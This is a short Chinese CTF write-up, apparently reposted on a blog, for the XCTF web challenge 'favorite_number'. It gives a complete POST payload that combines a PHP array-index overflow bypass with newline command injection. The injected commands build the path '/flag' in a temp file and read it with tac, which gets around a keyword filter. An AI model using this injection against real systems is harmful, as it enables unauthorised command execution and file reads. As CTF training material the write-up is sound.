当前位置:网站首页>攻防世界-favorite_number
攻防世界-favorite_number
2022-08-02 17:13:00 【NCNIPC梅苑】
favorite_number
首先泄露了php的版本
同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag
stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;
边栏推荐
猜你喜欢
阿波罗 planning代码-modules\planning\lattice\trajectory_generation\PiecewiseBrakingTrajectoryGenerator类详解
2022高压电工特种作业证考试题库及答案
Gartner released, annual Challenger!
oracle 和mysql 语句结果不一致问题
Navicat for mysql破解版安装
嵌入式Qt-做一个秒表
融云「 IM 进阶实战高手课」系列直播上线
电烙铁的基础知识
创新云集技术咖,工赋汇聚实战派:2022工赋开发者峰会
golang学习之七:并发编程基础(goroutine、channel、select)
随机推荐
golang源码分析(4):select
Smart Contract Security - delegatecall (1)
一些与开发者体验有关的话题
MySQL索引
智能合约安全——delegatecall (1)
Numpy those things
脉脉上的相亲生意
Informatica旗下PowerCenter的元数据库解析
SQL语句基础
executeScript异步执行的时候没有返回值的原因
Kubernetes:(六)Pod重启策略和状态解释
持续交付(一)JenkinsAPI接口调用
实时数仓架构演进及选型
npm install报错Fix the upstream dependency conflict, or retry
golang源码分析(9)调度
文件上传很难搞?10分钟带你学会阿里云OSS对象存储
德国客户对文档管理系统、工作流自动化软件 DocuWare 的评价
golang源码阅读(11)GO中各个目录的功能
每日优鲜倒了,叮咚买菜的春天在哪?
蔚来杯2022牛客暑期多校训练营5 ABCDFGHK